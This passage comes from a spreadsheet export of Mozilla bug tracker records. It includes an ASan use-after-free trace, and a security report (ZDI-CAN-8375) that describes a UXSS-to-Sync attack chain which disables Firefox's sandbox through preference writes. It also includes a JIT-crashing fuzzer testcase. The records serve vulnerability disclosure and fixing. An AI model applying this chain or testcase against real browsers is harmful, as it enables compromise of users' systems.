    #76 0x7f46da565487 in mozilla::PresShell::Paint(nsView*, nsRegion const&amp;, unsigned int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:6481:5
    #77 0x7f46d9d6c897 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) /home/worker/workspace/build/src/view/nsViewManager.cpp:484:7
    #78 0x7f46d9d6be97 in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:416:9
    #79 0x7f46d9d6f40d in nsViewManager::ProcessPendingUpdates() /home/worker/workspace/build/src/view/nsViewManager.cpp:1105:5
    #80 0x7f46da4bfc8a in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2037:7
    #81 0x7f46da4cbd25 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:305:7
    #82 0x7f46da4cb9f4 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:327:5
    #83 0x7f46da4ce063 in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:722:5
    #84 0x7f46da4ce063 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:631
    #85 0x7f46da4c9157 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::ParentProcessVsyncNotifier::Run() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:508:9
    #86 0x7f46d3c2db89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #87 0x7f46d3c2a480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #88 0x7f46d4a43eb4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:124:5
    #89 0x7f46d49b5028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #90 0x7f46d49b5028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #91 0x7f46d49b5028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #92 0x7f46d9ded82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #93 0x7f46dd430051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #94 0x7f46dd5edc0c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4470:10
    #95 0x7f46dd5ef708 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4647:8
    #96 0x7f46dd5f09cc in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4738:16
    #97 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
    #98 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
    #99 0x7f46eefdb82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #100 0x41c2e8 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41c2e8)
0x60b000214ce8 is located 88 bytes inside of 112-byte region [0x60b000214c90,0x60b000214d00)
freed by thread T0 here:
    #0 0x4b2a3b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f46d3acb2c4 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:9
    #2 0x7f46d3acaeb6 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
    #3 0x7f46d53d990e in AsyncFreeSnowWhite::Run() /home/worker/workspace/build/src/js/xpconnect/src/XPCJSContext.cpp:145:34
    #4 0x7f46d3c2db89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #5 0x7f46d3c2a480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #6 0x7f46d4a43ebf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #7 0x7f46d49b5028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #8 0x7f46d49b5028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #9 0x7f46d49b5028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #10 0x7f46d9ded82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #11 0x7f46dd430051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #12 0x7f46dd5edc0c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4470:10
    #13 0x7f46dd5ef708 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4647:8
    #14 0x7f46dd5f09cc in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4738:16
    #15 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
    #16 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
    #17 0x7f46eefdb82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
previously allocated by thread T0 here:
    #0 0x4b2d5b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e10cd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f46d6796c00 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f46d6796c00 in nsRange::CloneRange() const /home/worker/workspace/build/src/dom/base/nsRange.cpp:2495
    #4 0x7f46d67970ba in nsRange::CloneRange(nsIDOMRange**) /home/worker/workspace/build/src/dom/base/nsRange.cpp:2507:14
    #5 0x7f46d66801d4 in nsHTMLCopyEncoder::SetSelection(nsISelection*) /home/worker/workspace/build/src/dom/base/nsDocumentEncoder.cpp:1426:5
    #6 0x7f46d6596c5e in SelectionCopyHelper(nsISelection*, nsIDocument*, bool, short, unsigned int, nsITransferable**) /home/worker/workspace/build/src/dom/base/nsCopySupport.cpp:199:10
    #7 0x7f46da97e9ee in nsAutoCopyListener::NotifySelectionChanged(nsIDOMDocument*, nsISelection*, short) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6667:10
    #8 0x7f46da95f019 in mozilla::dom::Selection::NotifySelectionListeners() /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6254:5
    #9 0x7f46da97806c in NotifySelectionListeners /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:2429:12
    #10 0x7f46da97806c in mozilla::dom::Selection::Extend(nsINode&amp;, unsigned int, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:5762
    #11 0x7f46da9533e7 in Extend /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:5474:3
    #12 0x7f46da9533e7 in nsFrameSelection::TakeFocus(nsIContent*, unsigned int, unsigned int, mozilla::CaretAssociationHint, bool, bool) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1873
    #13 0x7f46da94ebaf in nsFrameSelection::MoveCaret(nsDirection, bool, nsSelectionAmount, nsFrameSelection::CaretMovementStyle) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1160:14
    #14 0x7f46da97c97d in mozilla::dom::Selection::Modify(nsAString_internal const&amp;, nsAString_internal const&amp;, nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6426:8
    #15 0x7f46d730a949 in mozilla::dom::SelectionBinding::modify(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Selection*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/SelectionBinding.cpp:778:3
    #16 0x7f46d7fdbf77 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2951:13
    #17 0x7f46dda78c24 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:281:15
    #18 0x7f46dda78c24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:463
    #19 0x7f46dda5ef88 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:514:12
    #20 0x7f46dda5ef88 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2960
    #21 0x7f46dda4411a in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:409:12
    #22 0x7f46dda78eb7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:481:15
    #23 0x7f46dda79552 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:527:10
    #24 0x7f46de426f3c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2865:12
    #25 0x7f46d7b59632 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #26 0x7f46d845fbbd in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #27 0x7f46d845fbbd in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #28 0x7f46d842a6f9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:16
    #29 0x7f46d842c5b4 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
    #30 0x7f46d8416eb3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:5
    #31 0x7f46d841a744 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #32 0x7f46da62158e in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1044:7
    #33 0x7f46dcae3e7f in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7632:5
    #34 0x7f46dcadfc44 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7426:7
    #35 0x7f46dcae765f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7323:13
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:308:36 in operator!
Shadow bytes around the buggy address:
  0x0c168003a940: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c168003a950: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x0c168003a960: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
  0x0c168003a970: 00 00 00 fa fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c168003a980: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
=&gt;0x0c168003a990: fa fa fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd
  0x0c168003a9a0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c168003a9b0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fd fd
  0x0c168003a9c0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c168003a9d0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c168003a9e0: fd fd fa fa fa fa fa fa fa fa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119582==ABORTING</t>
        </is>
      </c>
      <c r="X6141" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6142">
      <c r="A6142" t="n">
        <v>1538008</v>
      </c>
      <c r="B6142" t="inlineStr">
        <is>
          <t>2019-03-21 14:30:50 -0700</t>
        </is>
      </c>
      <c r="C6142" t="inlineStr">
        <is>
          <t>[ ZDI-CAN-8375] UXSS priv-esc via sync (install arbitrary extensions &amp; set arbitrary preferences)</t>
        </is>
      </c>
      <c r="D6142" t="inlineStr">
        <is>
          <t>2021-10-20 13:25:33 -0700</t>
        </is>
      </c>
      <c r="E6142" t="n">
        <v>1</v>
      </c>
      <c r="F6142" t="n">
        <v>1</v>
      </c>
      <c r="G6142" t="n">
        <v>2</v>
      </c>
      <c r="H6142" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6142" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6142" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K6142" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6142" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6142" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6142" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6142" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6142" t="inlineStr">
        <is>
          <t>[adv-main69+][adv-esr68.1+][adv-esr60.9+][do not publish until Bug 1538015 is shipped.]</t>
        </is>
      </c>
      <c r="Q6142" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6142" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6142" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6142" t="n">
        <v>1</v>
      </c>
      <c r="U6142" t="n">
        <v>0</v>
      </c>
      <c r="V6142" t="n">
        <v>38</v>
      </c>
      <c r="W6142" t="inlineStr">
        <is>
          <t># UXSS -&gt; privesc via sync (install arbitrary extensions &amp; set arbitrary preferences)
RCE in the Firefox renderer can be turned into UXSS via renderer patches (see
my Pwn2Own exploit).
Now login in to sync via UXSS on
https://accounts.firefox.com/signin?service=sync&amp;context=fx_desktop_v3&amp;entrypoint=menupanel
(this can probably be achieved via XPCOM but this is the easiest way to
do it). This lets you sync the victim browser with an attacker-controlled
account, leading immediately to:
1. Privesc to web extension
2. Arbitrary preference write by setting services.sync.prefs.sync.&lt;pref&gt; = true
    * On Linux: security.sandbox.content.level = 0 -&gt; Boom, no sandbox!
      (on Windows + macOS we are capped at 1, but we can at least bypass the
      desktop &amp; job lockdown)
    * browser.tabs.remote.autostart -&gt; turning this off disables e10s, but only after a restart
    * browser.download.{dir,useDownloadDir} -&gt; probably arbitrary file write, have not tested this
    * network.proxy.autoconfig_url = &lt;path to PAC file&gt;, network.proxy.type = 2,
      This script will be evaluated in browser process, so we can chain with a
      Spidermonkey exploit (such as the one I used at Pwn2Own)
I'm sure there is other interesting settings which lead to a full sandbox escape.</t>
        </is>
      </c>
      <c r="X6142" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6143">
      <c r="A6143" t="n">
        <v>1378881</v>
      </c>
      <c r="B6143" t="inlineStr">
        <is>
          <t>2017-07-06 10:29:31 -0700</t>
        </is>
      </c>
      <c r="C6143" t="inlineStr">
        <is>
          <t>On upgrade the client record is not updated with the fxaDeviceId</t>
        </is>
      </c>
      <c r="D6143" t="inlineStr">
        <is>
          <t>2017-07-12 07:25:05 -0700</t>
        </is>
      </c>
      <c r="E6143" t="n">
        <v>1</v>
      </c>
      <c r="F6143" t="n">
        <v>1</v>
      </c>
      <c r="G6143" t="n">
        <v>2</v>
      </c>
      <c r="H6143" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6143" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J6143" t="inlineStr">
        <is>
          <t>Firefox Accounts</t>
        </is>
      </c>
      <c r="K6143" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6143" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M6143" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N6143" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6143" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6143" t="inlineStr">
        <is>
          <t>[MobileCore][AutoPush]</t>
        </is>
      </c>
      <c r="Q6143" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6143" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6143" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6143" t="n">
        <v>1</v>
      </c>
      <c r="U6143" t="n">
        <v>0</v>
      </c>
      <c r="V6143" t="n">
        <v>11</v>
      </c>
      <c r="W6143" t="inlineStr">
        <is>
          <t>When the application is upgraded from v7.x to v8.x, the fxaDeviceId is not obtained and stored. 
jhugman says: I wonder if we should send `profileDidLoad` to `readyForSyncing` instead of `loginDidSucceed`</t>
        </is>
      </c>
      <c r="X6143" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6144">
      <c r="A6144" t="n">
        <v>1852218</v>
      </c>
      <c r="B6144" t="inlineStr">
        <is>
          <t>2023-09-08 00:52:30 -0700</t>
        </is>
      </c>
      <c r="C6144" t="inlineStr">
        <is>
          <t>Assertion failure: aPtr.mMutationCount == mMutationCount, at dist/include/mozilla/HashTable.h:2137</t>
        </is>
      </c>
      <c r="D6144" t="inlineStr">
        <is>
          <t>2024-07-12 20:13:42 -0700</t>
        </is>
      </c>
      <c r="E6144" t="n">
        <v>1</v>
      </c>
      <c r="F6144" t="n">
        <v>1</v>
      </c>
      <c r="G6144" t="n">
        <v>3</v>
      </c>
      <c r="H6144" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6144" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6144" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K6144" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6144" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6144" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6144" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6144" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6144" t="inlineStr">
        <is>
          <t>[bugmon:update,bisected,confirmed] [adv-main118+r]</t>
        </is>
      </c>
      <c r="Q6144" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6144" t="inlineStr">
        <is>
          <t>S4</t>
        </is>
      </c>
      <c r="S6144" t="inlineStr">
        <is>
          <t>119 Branch</t>
        </is>
      </c>
      <c r="T6144" t="n">
        <v>1</v>
      </c>
      <c r="U6144" t="n">
        <v>0</v>
      </c>
      <c r="V6144" t="n">
        <v>24</v>
      </c>
      <c r="W6144" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 20230907-f829a45e2207 (debug build, run with --fuzzing-safe --no-threads --disable-oom-functions --baseline-eager --ion-warmup-threshold=0):
    function patchSrc(src, exc) {
      try {
        let srcParts = src.split("\n");
        let srcLine = "d262 = undefined;"
        srcParts.splice(exc.lineNumber - 1, 0, srcLine);
        return srcParts.join("\n");
      } catch(exc) {}
    }
    initGlobals = new Set(Object.keys(this));
    loadFile(`
    //xorefuzz-dcd-selectmode
    /*---
    description: SingleNameBinding does assign name
    defines: [DETACHBUFFER]
    ---*/
    function DETACHBUFFER(buffer) {
      d262.detachArrayBuffer(buffer);
    }
    assert = initGlobals;
    assert.sameValue = DETACHBUFFER;
    `);
    loadFile(`
    //xorefuzz-dcd-evaluate
    // GENERATED, DO NOT EDIT
    // file: temporalHelpers.js
    // Copyright (C) 2021 Igalia, S.L. All rights reserved.
    // This code is governed by the BSD license found in the LICENSE file.
    /*---
    ---*/
    C55 = class {
      [1 * 1] = () =&gt; {};
    };
    c29 = new C55();
    assert.sameValue();
    `);
    function loadFile(lfVarx) {
        try {
          evaluate(lfVarx);
        } catch (lfVare) {
          if (lfVare.toString().indexOf("is not defined") &gt;= 0 || lfVare.toString().indexOf("is undefined") &gt;= 0) {
            newSrc = patchSrc(lfVarx, lfVare);
            loadFile(newSrc);
          }
        }
    }
Backtrace:
    received signal SIGSEGV, Segmentation fault.
    #0  0x00005555580a0d59 in bool mozilla::detail::HashTable&lt;mozilla::HashMapEntry&lt;unsigned int, js::jit::JitHintsMap::IonHint*&gt;, mozilla::HashMap&lt;unsigned int, js::jit::JitHintsMap::IonHint*, mozilla::DefaultHasher&lt;unsigned int, void&gt;, js::SystemAllocPolicy&gt;::MapHashPolicy, js::SystemAllocPolicy&gt;::add&lt;unsigned int&amp;, js::jit::JitHintsMap::IonHint*&amp;&gt;(mozilla::detail::HashTable&lt;mozilla::HashMapEntry&lt;unsigned int, js::jit::JitHintsMap::IonHint*&gt;, mozilla::HashMap&lt;unsigned int, js::jit::JitHintsMap::IonHint*, mozilla::DefaultHasher&lt;unsigned int, void&gt;, js::SystemAllocPolicy&gt;::MapHashPolicy, js::SystemAllocPolicy&gt;::AddPtr&amp;, unsigned int&amp;, js::jit::JitHintsMap::IonHint*&amp;) ()
    #1  0x000055555809b6a4 in js::jit::JitHintsMap::addIonHint(unsigned int, mozilla::detail::HashTable&lt;mozilla::HashMapEntry&lt;unsigned int, js::jit::JitHintsMap::IonHint*&gt;, mozilla::HashMap&lt;unsigned int, js::jit::JitHintsMap::IonHint*, mozilla::DefaultHasher&lt;unsigned int, void&gt;, js::SystemAllocPolicy&gt;::MapHashPolicy, js::SystemAllocPolicy&gt;::AddPtr&amp;) ()
    #2  0x000055555809bc11 in js::jit::JitHintsMap::recordIonCompilation(JSScript*) ()
    #3  0x0000555557f6536d in js::jit::CodeGenerator::link(JSContext*, js::jit::WarpSnapshot const*) ()
    #4  0x0000555557f9d522 in js::jit::Compile(JSContext*, JS::Handle&lt;JSScript*&gt;, js::jit::BaselineFrame*, unsigned char*) ()
    #5  0x0000555557f9c7c8 in js::jit::CanEnterIon(JSContext*, js::RunState&amp;) ()
    #6  0x000055555808bc3c in js::jit::MaybeEnterJit(JSContext*, js::RunState&amp;) ()
    #7  0x0000555557040e2f in js::RunScript(JSContext*, js::RunState&amp;) ()
    #8  0x0000555557041811 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) ()
    #9  0x0000555557043a27 in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;, js::CallReason) ()
    #10 0x0000555557b95bd5 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICFallbackStub*, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) ()
    #11 0x0000003afc1c0f07 in ?? ()
    [...]
    #22 0x0000000000000000 in ?? ()
    rax	0x55555583caad	93824995281581
    rbx	0x7ffff33fc000	140737274429440
    rcx	0x5555588e7888	93825046313096
    rdx	0x0	0
    rsi	0x7ffff6abd770	140737331844976
    rdi	0x7ffff6abc540	140737331840320
    rbp	0x7ffffff85850	140737487853648
    rsp	0x7ffffff85820	140737487853600
    r8	0x7ffff6abd770	140737331844976
    r9	0x7ffff7fe3840	140737354020928
    r10	0x2	2
    r11	0x0	0
    r12	0x7ffffff85874	140737487853684
    r13	0xffffffffffffff	72057594037927935
    r14	0x7ffffff858b0	140737487853744
    r15	0xeb674046c8035882	-1484146879447738238
    rip	0x5555580a0d59 &lt;bool mozilla::detail::HashTable&lt;mozilla::HashMapEntry&lt;unsigned int, js::jit::JitHintsMap::IonHint*&gt;, mozilla::HashMap&lt;unsigned int, js::jit::JitHintsMap::IonHint*, mozilla::DefaultHasher&lt;unsigned int, void&gt;, js::SystemAllocPolicy&gt;::MapHashPolicy, js::SystemAllocPolicy&gt;::add&lt;unsigned int&amp;, js::jit::JitHintsMap::IonHint*&amp;&gt;(mozilla::detail::HashTable&lt;mozilla::HashMapEntry&lt;unsigned int, js::jit::JitHintsMap::IonHint*&gt;, mozilla::HashMap&lt;unsigned int, js::jit::JitHintsMap::IonHint*, mozilla::DefaultHasher&lt;unsigned int, void&gt;, js::SystemAllocPolicy&gt;::MapHashPolicy, js::SystemAllocPolicy&gt;::AddPtr&amp;, unsigned int&amp;, js::jit::JitHintsMap::IonHint*&amp;)+1177&gt;
    =&gt; 0x5555580a0d59 &lt;_ZN7mozilla6detail9HashTableINS_12HashMapEntryIjPN2js3jit11JitHintsMap7IonHintEEENS_7HashMapIjS7_NS_13DefaultHasherIjvEENS3_17SystemAllocPolicyEE13MapHashPolicyESC_E3addIJRjRS7_EEEbRNSF_6AddPtrEDpOT_+1177&gt;:	movl   $0x859,0x0
       0x5555580a0d64 &lt;_ZN7mozilla6detail9HashTableINS_12HashMapEntryIjPN2js3jit11JitHintsMap7IonHintEEENS_7HashMapIjS7_NS_13DefaultHasherIjvEENS3_17SystemAllocPolicyEE13MapHashPolicyESC_E3addIJRjRS7_EEEbRNSF_6AddPtrEDpOT_+1188&gt;:	callq  0x555556f36513 &lt;abort&gt;
The testcase here reproduces reliably for me after 6-10 seconds but it does not reduce further and is comment-sensitive (so don't be rude around it ;)).
To me, this looks like a subtle form of memory corruption going on in JITs, marking s-s.</t>
        </is>
      </c>
      <c r="X6144" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6145">
      <c r="A6145" t="n">
        <v>544727</v>
      </c>
      <c r="B6145" t="inlineStr">
        <is>
          <t>2010-02-06 20:24:21 -0800</t>
        </is>
      </c>
      <c r="C6145" t="inlineStr">
        <is>
          <t>Rev 3 Windows Talos machines not always successfully doing cleanup</t>
        </is>
      </c>
      <c r="D6145" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6145" t="n">
        <v>1</v>
      </c>
      <c r="F6145" t="n">
        <v>1</v>
      </c>
      <c r="G6145" t="n">
        <v>5</v>
      </c>
      <c r="H6145" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6145" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6145" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6145" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6145" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6145" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N6145" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6145" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6145" t="inlineStr"/>
      <c r="Q6145" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6145" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6145" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
